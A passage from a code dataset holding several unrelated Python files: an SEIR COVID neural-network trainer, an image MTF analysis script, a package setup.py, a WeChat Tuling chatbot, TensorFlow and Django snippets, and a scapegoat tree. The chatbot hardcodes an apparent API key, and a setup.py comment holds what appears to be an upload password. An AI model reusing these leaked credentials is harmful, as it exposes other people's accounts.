S_observe))\r\n # LossE_Net_obs = tf.reduce_mean(tf.square(E_NN - E_observe))\r\n LossI_Net_obs = tf.reduce_mean(tf.square(I_NN - I_observe))\r\n # LossR_Net_obs = tf.reduce_mean(tf.square(R_NN - R_observe))\r\n LossN_Net_obs = tf.reduce_mean(tf.square(N_NN - N_observe))\r\n\r\n Loss2dS = tf.reduce_mean(tf.square(dS_NN2t - temp_snn2t))\r\n 
Loss2dE = tf.reduce_mean(tf.square(dE_NN2t - temp_enn2t))\r\n Loss2dI = tf.reduce_mean(tf.square(dI_NN2t - temp_inn2t))\r\n Loss2dR = tf.reduce_mean(tf.square(dR_NN2t - temp_rnn2t))\r\n Loss2dN = tf.reduce_mean(tf.square(dN_NN2t))\r\n elif str.lower(R['loss_function']) == 'lncosh_loss':\r\n # LossS_Net_obs = tf.reduce_mean(tf.ln(tf.cosh(S_NN - S_observe)))\r\n # LossE_Net_obs = tf.reduce_mean(tf.log(tf.cosh(E_NN - E_observe)))\r\n LossI_Net_obs = tf.reduce_mean(tf.log(tf.cosh(I_NN - I_observe)))\r\n # LossR_Net_obs = tf.reduce_mean(tf.log(tf.cosh(R_NN - R_observe)))\r\n LossN_Net_obs = tf.reduce_mean(tf.log(tf.cosh(N_NN - N_observe)))\r\n\r\n Loss2dS = tf.reduce_mean(tf.log(tf.cosh(dS_NN2t - temp_snn2t)))\r\n Loss2dE = tf.reduce_mean(tf.log(tf.cosh(dE_NN2t - temp_enn2t)))\r\n Loss2dI = tf.reduce_mean(tf.log(tf.cosh(dI_NN2t - temp_inn2t)))\r\n Loss2dR = tf.reduce_mean(tf.log(tf.cosh(dR_NN2t - temp_rnn2t)))\r\n Loss2dN = tf.reduce_mean(tf.log(tf.cosh(dN_NN2t)))\r\n\r\n if R['regular_weight_model'] == 'L1':\r\n regular_WB2S = DNN_base.regular_weights_biases_L1(Weight2S, Bias2S)\r\n regular_WB2E = DNN_base.regular_weights_biases_L1(Weight2E, Bias2E)\r\n regular_WB2I = DNN_base.regular_weights_biases_L1(Weight2I, Bias2I)\r\n regular_WB2R = DNN_base.regular_weights_biases_L1(Weight2R, Bias2R)\r\n elif R['regular_weight_model'] == 'L2':\r\n regular_WB2S = DNN_base.regular_weights_biases_L2(Weight2S, Bias2S)\r\n regular_WB2E = DNN_base.regular_weights_biases_L2(Weight2E, Bias2E)\r\n regular_WB2I = DNN_base.regular_weights_biases_L2(Weight2I, Bias2I)\r\n regular_WB2R = DNN_base.regular_weights_biases_L2(Weight2R, Bias2R)\r\n else:\r\n regular_WB2S = tf.constant(0.0)\r\n regular_WB2E = tf.constant(0.0)\r\n regular_WB2I = tf.constant(0.0)\r\n regular_WB2R = tf.constant(0.0)\r\n\r\n PWB2E = wb_penalty * regular_WB2E\r\n PWB2S = wb_penalty * regular_WB2S\r\n PWB2I = wb_penalty * regular_WB2I\r\n PWB2R = wb_penalty * regular_WB2R\r\n\r\n Loss2S = Loss2dS + PWB2S\r\n Loss2E = Loss2dE + PWB2E\r\n Loss2I = predict_true_penalty * LossI_Net_obs + Loss2dI + PWB2I\r\n Loss2R = Loss2dR + PWB2R\r\n Loss2All = LossN_Net_obs + Loss2dN\r\n\r\n my_optimizer = tf.train.AdamOptimizer(in_learning_rate)\r\n train_Loss2S = my_optimizer.minimize(Loss2S, global_step=global_steps)\r\n train_Loss2E = my_optimizer.minimize(Loss2E, global_step=global_steps)\r\n train_Loss2I = my_optimizer.minimize(Loss2I, global_step=global_steps)\r\n train_Loss2R = my_optimizer.minimize(Loss2R, global_step=global_steps)\r\n train_Loss2All = my_optimizer.minimize(Loss2All, global_step=global_steps)\r\n train_Loss = tf.group(train_Loss2S, train_Loss2E, train_Loss2I, train_Loss2R, train_Loss2All)\r\n\r\n t0 = time.time()\r\n loss_s_all, loss_e_all, loss_i_all, loss_r_all, loss_n_all = [], [], [], [], []\r\n test_epoch = []\r\n test_mse2I_all, test_rel2I_all = [], []\r\n\r\n # filename = 'data2csv/Italia_data.csv'\r\n filename = 'data2csv/Korea_data.csv'\r\n date, data = RNN_data.load_csvData(filename)\r\n assert (trainSet_szie + test_size2batch <= len(data))\r\n\r\n train_date, train_data, test_date, test_data = \\\r\n RNN_data.split_csvData2train_test(date, data, size2train=trainSet_szie, normalFactor=R['total_population'])\r\n\r\n if R['total_population'] != 1:\r\n Have_normal = True\r\n NormalFactor = 1.0\r\n else:\r\n Have_normal = False\r\n NormalFactor = R['total_population']\r\n\r\n if R['total_population'] == 1:\r\n ndata2train = np.ones(train_size2batch, dtype=np.float32) * float(9776000)\r\n else:\r\n ndata2train = 
np.ones(train_size2batch, dtype=np.float32)\r\n\r\n # for time-series data, the model should be validated on consecutive time points\r\n test_t_bach = RNN_data.sample_testDays_serially(test_date, test_size2batch)\r\n i_obs_test = RNN_data.sample_testData_serially(test_data, test_size2batch, NormalFactor)\r\n\r\n # ConfigProto with allow_soft_placement=True makes the GPU usable\r\n config = tf.ConfigProto(allow_soft_placement=True) # configure the session at creation time\r\n config.gpu_options.allow_growth = True # True lets TensorFlow allocate GPU memory dynamically at runtime, avoiding excessive usage\r\n config.allow_soft_placement = True # if the specified device does not exist, allow falling back to an existing one, e.g. run on CPU when there is no GPU\r\n with tf.Session(config=config) as sess:\r\n sess.run(tf.global_variables_initializer())\r\n tmp_lr = learning_rate\r\n for i_epoch in range(R['max_epoch'] + 1):\r\n t_batch, i_obs = RNN_data.randSample_Normalize_existData(train_date, train_data, batchsize=train_size2batch,\r\n normalFactor=NormalFactor)\r\n n_obs = ndata2train.reshape(train_size2batch, 1)\r\n tmp_lr = tmp_lr * (1 - lr_decay)\r\n train_option = True\r\n if R['activate_stage_penalty'] == 1:\r\n if i_epoch < int(R['max_epoch'] / 10):\r\n temp_penalty_pt = pt_penalty_init\r\n elif i_epoch < int(R['max_epoch'] / 5):\r\n temp_penalty_pt = 10 * pt_penalty_init\r\n elif i_epoch < int(R['max_epoch'] / 4):\r\n temp_penalty_pt = 50 * pt_penalty_init\r\n elif i_epoch < int(R['max_epoch'] / 2):\r\n temp_penalty_pt = 100 * pt_penalty_init\r\n elif i_epoch < int(3 * R['max_epoch'] / 4):\r\n temp_penalty_pt = 200 * pt_penalty_init\r\n else:\r\n temp_penalty_pt = 500 * pt_penalty_init\r\n elif R['activate_stage_penalty'] == 2:\r\n if i_epoch < int(R['max_epoch'] / 3):\r\n temp_penalty_pt = pt_penalty_init\r\n elif i_epoch < 2 * int(R['max_epoch'] / 3):\r\n temp_penalty_pt = 10 * pt_penalty_init\r\n else:\r\n temp_penalty_pt = 50 * pt_penalty_init\r\n else:\r\n temp_penalty_pt = pt_penalty_init\r\n\r\n _, loss_s, loss_e, loss_i, loss_r, loss_n, pwb2s, pwb2e, pwb2i, pwb2r = sess.run(\r\n [train_Loss, Loss2S, Loss2E, Loss2I, Loss2R, Loss2All, PWB2S, PWB2E, PWB2I, PWB2R],\r\n feed_dict={T_it: t_batch, I_observe: i_obs, N_observe: n_obs, in_learning_rate: tmp_lr,\r\n train_opt: train_option, predict_true_penalty: temp_penalty_pt})\r\n\r\n loss_s_all.append(loss_s)\r\n loss_e_all.append(loss_e)\r\n loss_i_all.append(loss_i)\r\n loss_r_all.append(loss_r)\r\n loss_n_all.append(loss_n)\r\n\r\n if i_epoch % 1000 == 0:\r\n print_and_log2train(i_epoch, time.time() - t0, tmp_lr, temp_penalty_pt, pwb2s, pwb2e, pwb2i, pwb2r,\r\n loss_s, loss_e, loss_i, loss_r, loss_n, log_out=log_fileout)\r\n test_epoch.append(i_epoch / 1000)\r\n train_option = False\r\n s_nn2test, e_nn2test, i_nn2test, r_nn2test, alpha_test, beta_test, gamma_test = sess.run(\r\n [S_NN, E_NN, I_NN, R_NN, alpha, beta, gamma], feed_dict={T_it: test_t_bach, train_opt: train_option})\r\n point_ERR2I = np.square(i_nn2test - i_obs_test)\r\n test_mse2I = np.mean(point_ERR2I)\r\n test_mse2I_all.append(test_mse2I)\r\n test_rel2I = test_mse2I / np.mean(np.square(i_obs_test))\r\n test_rel2I_all.append(test_rel2I)\r\n\r\n saveData.save_SEIR_trainLoss2mat_Covid(loss_s_all, loss_e_all, loss_i_all, loss_r_all, loss_n_all,\r\n actName=act_func, outPath=R['FolderName'])\r\n\r\n plotData.plotTrain_loss_1act_func(loss_s_all, lossType='loss2s', seedNo=R['seed'], outPath=R['FolderName'],\r\n yaxis_scale=True)\r\n plotData.plotTrain_loss_1act_func(loss_e_all, lossType='loss2e', seedNo=R['seed'], outPath=R['FolderName'],\r\n yaxis_scale=True)\r\n plotData.plotTrain_loss_1act_func(loss_i_all, lossType='loss2i', seedNo=R['seed'], 
outPath=R['FolderName'],\r\n yaxis_scale=True)\r\n plotData.plotTrain_loss_1act_func(loss_r_all, lossType='loss2r', seedNo=R['seed'], outPath=R['FolderName'],\r\n yaxis_scale=True)\r\n plotData.plotTrain_loss_1act_func(loss_n_all, lossType='loss2n', seedNo=R['seed'], outPath=R['FolderName'],\r\n yaxis_scale=True)\r\n\r\n saveData.save_testMSE_REL2mat(test_mse2I_all, test_rel2I_all, actName='Infected', outPath=R['FolderName'])\r\n plotData.plotTest_MSE_REL(test_mse2I_all, test_rel2I_all, test_epoch, actName='Infected', seedNo=R['seed'],\r\n outPath=R['FolderName'], yaxis_scale=True)\r\n saveData.save_SEIR_testSolus2mat_Covid(s_nn2test, e_nn2test, i_nn2test, r_nn2test, name2solus1='snn2test',\r\n name2solus2='enn2test', name2solus3='inn2test', name2solus4='rnn2test',\r\n outPath=R['FolderName'])\r\n saveData.save_SEIR_testParas2mat_Covid(alpha_test, beta_test, gamma_test, name2para1='alpha2test',\r\n name2para2='beta2test', name2para3='gamma2test',\r\n outPath=R['FolderName'])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n R = {}\r\n R['gpuNo'] = 0 # use the GPU by default; do not set this flag to -1, set it to 0,1,2,3,4....n (n is the number of GPUs in the machine)\r\n\r\n # output path settings\r\n store_file = 'SEIR2covid'\r\n BASE_DIR = os.path.dirname(os.path.abspath(__file__))\r\n sys.path.append(BASE_DIR)\r\n OUT_DIR = os.path.join(BASE_DIR, store_file)\r\n if not os.path.exists(OUT_DIR):\r\n print('---------------------- OUT_DIR ---------------------:', OUT_DIR)\r\n os.mkdir(OUT_DIR)\r\n\r\n R['seed'] = np.random.randint(1e5)\r\n seed_str = str(R['seed']) # convert int to string\r\n FolderName = os.path.join(OUT_DIR, seed_str) # join the paths\r\n R['FolderName'] = FolderName\r\n if not os.path.exists(FolderName):\r\n print('--------------------- FolderName -----------------:', FolderName)\r\n os.mkdir(FolderName)\r\n\r\n # ---------------------------------------- copy and save the current file -----------------------------------------\r\n if platform.system() == 'Windows':\r\n tf.compat.v1.reset_default_graph()\r\n shutil.copy(__file__, '%s/%s' % (FolderName, os.path.basename(__file__)))\r\n else:\r\n shutil.copy(__file__, '%s/%s' % (FolderName, os.path.basename(__file__)))\r\n\r\n # if the value of step_stop_flag is not 0, it will activate stop condition of step to kill program\r\n step_stop_flag = input('please input an integer number to activate step-stop----0:no---!0:yes--:')\r\n R['activate_stop'] = int(step_stop_flag)\r\n # if the value of step_stop_flag is not 0, it will activate stop condition of step to kill program\r\n R['max_epoch'] = 200000\r\n if 0 != R['activate_stop']:\r\n epoch_stop = input('please input a stop epoch:')\r\n R['max_epoch'] = int(epoch_stop)\r\n\r\n R['eqs_name'] = 'SEIR'\r\n R['input_dim'] = 1 # input dimension, i.e. the dimension of the problem\r\n R['output_dim'] = 1 # output dimension\r\n\r\n # ------------------------------------ neural network settings ----------------------------------------\r\n R['size2train'] = 70 # size of the training set\r\n R['batch_size2train'] = 20 # batch size for the training data\r\n R['batch_size2test'] = 10 # batch size for the test data\r\n\r\n R['init_penalty2predict_true'] = 50 # Regularization parameter for boundary conditions\r\n R['activate_stage_penalty'] = 1 # whether to enable staged adjustment of the boundary penalty\r\n if R['activate_stage_penalty'] == 1 or R['activate_stage_penalty'] == 2:\r\n R['init_penalty2predict_true'] = 1\r\n\r\n # R['regular_weight_model'] = 'L0'\r\n # R['regular_weight_model'] = 'L1'\r\n R['regular_weight_model'] = 'L2' # The model of regular weights and biases\r\n # R['regular_weight'] = 0.000 # Regularization parameter for weights\r\n R['regular_weight'] = 0.001 # Regularization parameter for weights\r\n\r\n if 50000 < R['max_epoch']:\r\n 
R['learning_rate'] = 2e-4 # learning rate\r\n R['lr_decay'] = 5e-5 # learning rate decay\r\n elif (20000 < R['max_epoch'] and 50000 >= R['max_epoch']):\r\n R['learning_rate'] = 1e-4 # learning rate\r\n R['lr_decay'] = 5e-5 # learning rate decay\r\n else:\r\n R['learning_rate'] = 5e-5 # learning rate\r\n R['lr_decay'] = 1e-5 # learning rate decay\r\n R['optimizer_name'] = 'Adam' # optimizer\r\n # R['loss_function'] = 'L2_loss'\r\n R['loss_function'] = 'lncosh_loss'\r\n\r\n # R['hidden_layers'] = (10, 10, 8, 6, 6, 3) # it is used to debug our work\r\n R['hidden_layers'] = (80, 80, 60, 40, 40, 20)\r\n # R['hidden_layers'] = (100, 100, 80, 60, 60, 40)\r\n # R['hidden_layers'] = (200, 100, 100, 80, 50, 50)\r\n # R['hidden_layers'] = (300, 200, 200, 100, 80, 80)\r\n # R['hidden_layers'] = (400, 300, 300, 200, 100, 100)\r\n # R['hidden_layers'] = (500, 400, 300, 200, 200, 100, 100)\r\n # R['hidden_layers'] = (600, 400, 400, 300, 200, 200, 100)\r\n # R['hidden_layers'] = (1000, 500, 400, 300, 300, 200, 100, 100)\r\n\r\n # choice of network model\r\n # R['model'] = 'PDE_DNN'\r\n # R['model'] = 'PDE_DNN_BN'\r\n # R['model'] = 'PDE_DNN_scaleOut'\r\n R['model'] = 'PDE_DNN_Fourier'\r\n\r\n # choice of activation function\r\n # R['act_name'] = 'relu'\r\n # R['act_name'] = 'tanh'\r\n # R['act_name'] = 'leaky_relu'\r\n # R['act_name'] = 'srelu'\r\n R['act_name'] = 's2relu'\r\n # R['act_name'] = 'slrelu'\r\n # R['act_name'] = 'elu'\r\n # R['act_name'] = 'selu'\r\n # R['act_name'] = 'phi'\r\n\r\n R['total_population'] = 9776000\r\n # R['total_population'] = 1\r\n\r\n solve_SEIR2COVID(R)\r\n","sub_path":"SEIR_RNN.py","file_name":"SEIR_RNN.py","file_ext":"py","file_size_in_byte":26961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"188093293","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 20 16:42:38 2017\n\nThis method detects a region within an image on which to perform MTF analysis.\n\n@author: Gus\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\" Settings \"\"\"\ntarget_path_vert = \"C:/Users/Gus/Documents/GitHub/testing_code/target2.PNG\"\nimage_path = \"C:/Users/Gus/Documents/GitHub/testing_code/vid_image2.jpg\"\n# image_path = \"C:/Users/Gus/Documents/GitHub/testing_code/target2.PNG\"\n\ndef TEST():\n vertical = True\n pixel_pitch_mm = 2.2/1000\n raw_image = cv2.imread(image_path)\n grey_image = grey_img(raw_image)\n target_coords = find_target(grey_image, vert = vertical, display = True)\n roi = grab_roi(target_coords[0],target_coords[1],grey_image)\n # cv2.imshow(\"ROI\", roi)\n upline, downline = grab_line(roi, vert = vertical)\n MTF_curve(upline, pixel_pitch_mm)\n \ndef find_target(grey_image, vert = True, num_scales = 10, display = False):\n templ = cv2.imread(target_path_vert)\n templ = cv2.cvtColor(templ, cv2.COLOR_BGR2GRAY)\n if not vert:\n templ = cv2.transpose(templ)\n templ = cv2.flip(templ,1)\n \n img2 = grey_image\n\n method = cv2.TM_CCORR_NORMED\n \n scales = np.geomspace(0.1,10,num_scales)\n \n best_max = 0\n best_match = None\n \n for scale in scales:\n resiz = cv2.resize(templ, (0,0), fx = scale, fy = scale)\n \n if resiz.shape[0] > img2.shape[0] or resiz.shape[1] > img2.shape[1]:\n continue\n # Step 2: Get the size of the template. 
This is the same size as the match.\n trows,tcols = resiz.shape[:2]\n\n img = img2.copy()\n \n result = cv2.matchTemplate(resiz, img, method)\n \n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)\n\n # If the method is TM_SQDIFF or TM_SQDIFF_NORMED, take minimum\n if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\n MPx,MPy = min_loc\n else:\n MPx,MPy = max_loc\n \n if max_val > best_max:\n best_max = max_val\n best_match = [(MPx,MPy),(MPx+tcols,MPy+trows)]\n \n if best_match is None:\n return None\n \n # Step 3: Draw the rectangle on large_image\n cv2.rectangle(img2, best_match[0], best_match[1],(0,0,255),2)\n \n small = cv2.resize(img2, (0,0), fx = 0.5, fy = 0.5)\n \n if display:\n cv2.imshow(\"Matches\", small)\n \n return best_match\n\ndef grey_img(image):\n if len(image.shape) == 3:\n return cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n else:\n return image\n\ndef grab_roi(corner1, corner2, grey_image):\n x1 = corner1[1]\n y1 = corner1[0]\n x2 = corner2[1]\n y2 = corner2[0]\n if x2>x1 and y2>y1:\n return grey_image[x1:x2,y1:y2]\n if x2>x1 and not y2>y1:\n return grey_image[x1:x2,y2:y1]\n if not x2>x1 and y2>y1:\n return grey_image[x2:x1,y1:y2]\n else:\n return grey_image[x2:x1,y2:y1]\n \ndef grab_line(roi_image, vert = True):\n # trim ROI to only include the tilted thing\n L,W = roi_image.shape\n roi_image = roi_image[int(0.2*L):int(0.8*L),int(0.2*W):int(0.8*W)]\n #cv2.imshow(\"trimmed ROI\", roi_image)\n \n if vert:\n roi_image = cv2.transpose(roi_image)\n \n sums = np.sum(roi_image, 1)\n sums = sums.astype(float)\n norm_sums = (sums-min(sums))/(max(sums)-min(sums))\n norm_diff = np.ediff1d(norm_sums)\n \n # find the points closest to half way\n inds = (np.abs(norm_sums-0.5)).argsort()\n \n upline = None\n downline = None\n \n for ind in inds:\n if upline is not None and downline is not None:\n break\n if upline is None:\n if norm_diff[ind] > 0:\n upline = roi_image[ind,:]\n if downline is None:\n if norm_diff[ind] < 0:\n downline = roi_image[ind,:]\n\n# plt.plot(norm_sums)\n# plt.figure()\n# plt.plot(norm_diff)\n# plt.figure()\n# plt.plot(upline)\n# plt.plot(downline)\n# plt.show()\n return upline, downline\n \ndef MTF_curve(line, pixel_pitch_mm):\n sfr = line\n sfr = sfr/max(sfr)\n plt.figure(\"sfr\")\n plt.plot(sfr)\n \n lsf = np.diff(sfr)\n # lsf = np.absolute(lsf)\n plt.plot(lsf)\n \n mtf = np.absolute(np.fft.fft(lsf))\n freq = np.fft.fftfreq(mtf.shape[0])\n spac_freq = freq/pixel_pitch_mm\n mtf = mtf[freq>0]\n spac_freq = spac_freq[freq>0]\n plt.figure(\"mtf\")\n plt.plot(spac_freq,mtf)\n\nif __name__ == \"__main__\":\n sums = TEST()","sub_path":"Organized/_Image_Detect.py","file_name":"_Image_Detect.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"149181716","text":"from distutils.core import setup\n\n# PS3intGkXcEGKjw\n# python setup.py sdist\n# twine upload --skip-existing dist/*\n\nSOURCE_CODE_DOWNLOAD_URL = 'https://github.com/NyAinaLorenzo/DataFrameManipulator/archive/v_0.6.1.zip'\nVERSION = '0.6.1'\n\nsetup(\n name='DataFrameManipulator', # How you named your package folder (MyLib)\n packages=['DataFrameManipulator'], # Chose the same as \"name\"\n version=VERSION, # Start with a small number and increase it with every change you make\n license='MIT', # Chose a license from here: https://help.github.com/articles/licensing-a-repository\n description='Used on top of pandas', # Give a short description about your library\n author='Lolo RAM', # Type in your name\n 
author_email='lolo.ramaromanana@gmail.com', # Type in your E-Mail\n url='https://github.com/NyAinaLorenzo/DataFrameManipulator',\n # Provide either the link to your github or to your website\n download_url=SOURCE_CODE_DOWNLOAD_URL,\n # I explain this later on\n keywords=['DATAFRAME', 'MANIPULATION'], # Keywords that define your package best\n install_requires=[ # I get to this in a second\n 'sklearn',\n 'joblib',\n 'numpy',\n 'pandas',\n 'requests',\n 'boto3'\n ],\n classifiers=[\n 'Development Status :: 3 - Alpha',\n # Chose either \"3 - Alpha\", \"4 - Beta\" or \"5 - Production/Stable\" as the current state of your package\n 'Intended Audience :: Developers', # Define that your audience are developers\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: MIT License', # Again, pick a license\n 'Programming Language :: Python :: 3', # Specify which python versions that you want to support\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n)\n","sub_path":"pypi_install_script/DataFrameManipulator-0.6.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"375957596","text":"import requests\nimport itchat\nimport json\nfrom wxpy import *\n\ntulingKey = 'eeaa98347259474a865d3aad734d859c'\nitchat = Bot(cache_path=False)\nfriend = itchat.friends().search(name=u'湖南中业金服不聊工作群')\n\ndef get_response(msg):\n apiUrl = 'http://openapi.tuling123.com/openapi/api/v2'\n data = {\n \"reqType\": 0,\n \"perception\": {\n \"inputText\": {\n \"text\": msg['Text']\n },\n \"selfInfo\": {\n \"location\": {\n \"city\": \"广东\",\n \"province\": \"深圳\",\n \"street\": \"南山\"\n }\n\n }\n },\n \"userInfo\": {\n \"apiKey\": tulingKey,\n \"userId\": 20180931\n }\n }\n try:\n r = requests.post(apiUrl, data=json.dumps(data)).json()\n print(r)\n return r['results'][0]['values']['text']\n except:\n return\n\n\n@itchat.msg_register(itchat.content.TEXT)\ndef tuling_reply(msg):\n defaultReply = '呵呵'\n print(msg['Text'])\n reply = get_response(msg)\n # you can change the reply prefix here yourself\n return reply or defaultReply\n\nif __name__ == \"__main__\":\n embed()","sub_path":"python-syx/work/wx/groupTalk.py","file_name":"groupTalk.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"23897563","text":"import json\n\nname = input(\"Имя: \")\nphone = input(\"Телефон: \")\n\ndef create_json():\n json_data = [{\n \"name\": name,\n \"phone\": phone\n }]\n with open('users.json', 'w') as file:\n file.write(json.dumps(json_data, indent=2, ensure_ascii=False))\ncreate_json()\n\ndef add_to_json():\n json_data = {\n \"name\": name,\n \"phone\": phone,\n }\n data = json.load(open(\"users.json\"))\n data.append(json_data)\n with open(\"users.json\", \"w\") as file:\n json.dump(data, file, indent=2, ensure_ascii=False)\n\nadd_to_json()\n","sub_path":"bots/test_json/write_to_json.py","file_name":"write_to_json.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"211546127","text":"\"\"\"@file permute_stacker.py\ncontains the PermuteStacker class\"\"\"\n\nimport tensorflow as tf\nimport model\nimport numpy as np\nimport itertools\n\n\nclass PermuteStacker(model.Model):\n\t\"\"\"Returns a model that permutes along a given dimension and stacks along a 
different dimension\"\"\"\n\n\tdef _get_outputs(self, inputs, input_seq_length=None, is_training=None):\n\t\t\"\"\"\n\t\tpermutes and stacks the inputs\n\n\t\tArgs:\n\t\t\tinputs: the inputs to concatenate, this is a list of\n\t\t\t\t[batch_size x time x ...] tensors and/or [batch_size x ...] tensors\n\t\t\tinput_seq_length: None\n\t\t\tis_training: None\n\n\t\tReturns:\n\t\t\t- outputs, the reshaped input\n\t\t\"\"\"\n\n\t\tpermute_dim = int(self.conf['permute_dim'])\n\t\tstack_dim = int(self.conf['stack_dim'])\n\n\t\t# code not available for multiple inputs!!\n\t\tif len(inputs) > 1:\n\t\t\traise ValueError('The implementation of PermuteStacker expects 1 input and not %d' % len(inputs))\n\t\telse:\n\t\t\tinput = inputs[0]\n\n\t\twith tf.variable_scope(self.scope):\n\t\t\tpermute_dim_size = input.get_shape()[permute_dim]\n\t\t\tpermutations = list(itertools.permutations(range(permute_dim_size), permute_dim_size))\n\n\t\t\tall_inp_perms = [tf.gather(input, perm, axis=permute_dim) for perm in permutations]\n\t\t\toutput = tf.concat(all_inp_perms, axis=stack_dim)\n\n\t\treturn output\n","sub_path":"nabu/neuralnetworks/models/permute_stacker.py","file_name":"permute_stacker.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"52722655","text":"# Production Django settings\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'freezers', # Or path to database file if using sqlite3.\n 'USER': 'cjrogers',\n # 'PASSWORD': '',\n # 'HOST': '', # Set to empty string for localhost.\n # 'PORT': '', # Set to empty string for default.\n }\n}\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com/media/\", \"http://example.com/media/\"\nMEDIA_URL = 'http://127.0.0.1:8000/resources/'\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = 'http://127.0.0.1:8000/static/'\n","sub_path":"Freezers3/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} {"seq_id":"217293377","text":"import sys\nimport os\nimport math\nimport random\n\nclass Node:\n\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\nclass Tree:\n\n def __init__(self, alpha):\n self.root = None\n self.tree_size = 0\n self.max_node_count = 0\n self.alpha = alpha\n\n # Prints a tree using inorder traversal\n def print_tree(self):\n lst = []\n self.inorder(lst, self.root)\n print(lst)\n\n # Equation used to check if a rebuild is triggered (depth > alpha_Log(tree_size))\n def alpha_log(self, size):\n return math.log(size, 1/self.alpha)\n\n # Builds a list of nodes in sorted order\n def inorder(self, lst, root):\n if root is None:\n return\n self.inorder(lst, root.left)\n lst.append(root)\n self.inorder(lst, root.right)\n\n # Returns the number of nodes in a sub-tree\n def size(self, node):\n if node is None:\n return 0\n return self.size(node.left) + self.size(node.right) + 1\n\n # Builds a binary search tree from a sorted list of Nodes\n def build_tree(self, arr):\n if not arr:\n return None\n \n mid = int(len(arr)/2)\n root = arr[mid]\n root.left = self.build_tree(arr[:mid])\n root.right = self.build_tree(arr[mid+1:])\n return root\n\n # Inserts an element into the tree. 
If the inserted node is too deep,\n # a rebuild is triggered by finding the top-level node that has uneven left\n # and right branches and rebuilding the tree.\n def insert(self, val):\n if self.root is None:\n self.root = Node(val)\n self.tree_size += 1\n else:\n\n depth = 0\n current = self.root\n prev = None\n\n parent_list = []\n\n # Find position to insert new node\n while current != None:\n parent_list.append(current)\n prev = current\n if current.val > val:\n current = current.left\n else:\n current = current.right\n depth += 1\n\n if prev.val > val:\n prev.left = Node(val)\n else:\n prev.right = Node(val)\n\n self.tree_size += 1\n self.max_node_count = max(self.tree_size, self.max_node_count)\n\n # Node is too deep, rebuild tree\n if depth > math.floor(self.alpha_log(self.tree_size) + 1):\n print(\"rebuild triggered after inserting\", val)\n\n scapegoat = None\n scapegoat_index = 0\n \n # Find highest level scapegoat node\n for i in range(1, len(parent_list)):\n ancestor = parent_list[i]\n alpha_size = self.size(ancestor) * self.alpha\n if self.size(ancestor.left) <= alpha_size and self.size(ancestor.right) <= alpha_size:\n continue\n else:\n scapegoat = ancestor\n scapegoat_index = i\n break\n \n # Found top-level scapegoat node, rebuild subtree\n print(\"Scapegoat is\", scapegoat.val)\n sg_parent = parent_list[scapegoat_index-1]\n node_list = []\n self.inorder(node_list, scapegoat)\n new_root = self.build_tree(node_list)\n \n if sg_parent.left == scapegoat:\n sg_parent.left = new_root\n else:\n sg_parent.right = new_root\n\n\n # Returns the minimum node in a subtree\n def find_min(self, node):\n current = node\n while current.left is not None:\n current = current.left\n return current\n\n\n # Deletes a node in the tree and rebuilds the entire tree if the\n # updated size is less than or equal to the max size times alpha.\n def delete(self, val):\n # reassign in case the root node itself was replaced\n self.root = self.delete_node(val, self.root)\n self.tree_size -= 1\n\n\n # Auxiliary function for delete()\n def delete_node(self, val, node):\n if node is None:\n return None\n \n if node.val < val:\n node.right = self.delete_node(val, node.right)\n elif node.val > val:\n node.left = self.delete_node(val, node.left)\n else:\n if node.left is None:\n return node.right\n if node.right is None:\n return node.left\n\n # Replace node to be deleted with successor node \n temp = self.find_min(node.right)\n print(\"min is\", temp.val)\n node.val = temp.val\n node.right = self.delete_node(temp.val, node.right)\n\n # Delete triggered rebuild of entire tree\n if self.tree_size <= self.alpha * self.max_node_count:\n print(\"Delete triggered rebuild of entire tree\")\n node_list = []\n self.inorder(node_list, self.root)\n self.root = self.build_tree(node_list)\n return self.root\n else:\n return node\n\n\n # Returns True if the value is found in the tree, False otherwise.\n def search(self, val):\n if self.root is None:\n return False\n else:\n\n current = self.root\n while current != None:\n if current.val > val:\n current = current.left\n elif current.val < val:\n current = current.right\n else:\n return True\n return False\n\n\n# Pretty print a tree\ndef print_tree(node, level):\n if node is not None:\n print_tree(node.left, level+4)\n print(\" \"*level, node.val)\n print_tree(node.right, level+4)\n\n \ndef main():\n \n try:\n file = open(\"tree.txt\", mode=\"r\")\n except:\n print(\"File must be named 'tree.txt'\")\n sys.exit(1)\n\n cmd_list = [line.rstrip(\"\n\").replace(\",\", \"\") for line in file]\n t = None\n\n for cmd in cmd_list:\n cmd = 
